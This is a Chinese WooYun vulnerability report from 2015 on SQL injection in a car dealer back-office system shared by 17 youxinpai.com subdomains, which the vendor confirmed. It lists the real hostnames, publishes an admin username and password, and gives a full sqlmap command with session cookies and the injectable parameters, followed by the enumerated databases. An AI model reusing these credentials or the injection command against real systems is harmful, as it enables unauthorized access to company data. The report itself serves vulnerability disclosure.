当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149949

漏洞标题:优信二手车17个系统后台存在SQL注入(需登录)

相关厂商:xin.com

漏洞作者: hecate

提交时间:2015-10-27 23:03

修复时间:2015-12-12 11:14

公开时间:2015-12-12 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

新厂商继续修复 加油 加油 钢巴得!
有礼物吗

详细说明:

昨天发的已经修复了 http://wooyun.org/bugs/wooyun-2010-0149556
今天登录了后台,早就猜到有注入
以下17个站点后台使用的是同一套系统

http://nissancorp.dealer.youxinpai.com
http://gtmc.dealer.youxinpai.com
http://jlr.dealer.youxinpai.com
http://xd2sc.dealer.youxinpai.com
http://ftms.dealer.youxinpai.com
http://dongfeng-citroencorp.dealer.youxinpai.com
http://ford.dealer.youxinpai.com
http://chrysler.dealer.youxinpai.com
http://ghac.dealer.youxinpai.com
http://gmmc.dealer.youxinpai.com
http://chery.dealer.youxinpai.com
http://faw-vw.dealer.youxinpai.com
http://faw-mazda.dealer.youxinpai.com
http://peugeotcorp.dealer.youxinpai.com
http://wdhac.dealer.youxinpai.com
http://fawcar.dealer.youxinpai.com
http://dealer.youxinpai.com


先登录进去 账号 xgmp_admin 密码 323630

22.png


查询车辆处存在SQL注入

sqlmap -u "http://dealer.youxinpai.com/ck_testcheck/view?bigareaid=1&provinceid=2&cityid=201&car_scarmodel=0&car_scarmodels=&car_serials=&vin=&imei=&status=-1&start_time=2015-10-01&end_time=2015-10-27&submit=%E6%9F%A5%E8%AF%A2" --cookie="Hm_lvt_ba6c9b2e42a10e9b1ab56a2c104f1dae=1445844740; PHPSESSID=pn3chcsq093ce7pkfnjglgv6k2; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e1a3a951506f93b68432502e9776c982%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22113.251.217.210%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A74%3A%22Mozilla%2F5.0+%28X11%3B+Ubuntu%3B+Linux+i686%3B+rv%3A41.0%29+Gecko%2F20100101+Firefox%2F41.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445944510%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22captcha%22%3Bs%3A7%3A%22epicyte%22%3B%7Df20576a7d33b3ebeafa525fe297c03c8; 3182_page=stat_ck%2C%2Fck_testcheck%2Fview" -p "car_scarmodel" --current-user
两个参数 car_scarmodel,vin均可注入


11.png


available databases [4]:
[*] AuditDB
[*] information_schema
[*] test
[*] yxp_cp

漏洞证明:

如上

修复方案:

过滤,上WAF

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-28 11:12

厂商回复:

谢谢反馈!感谢对我们的关注!

最新状态:

暂无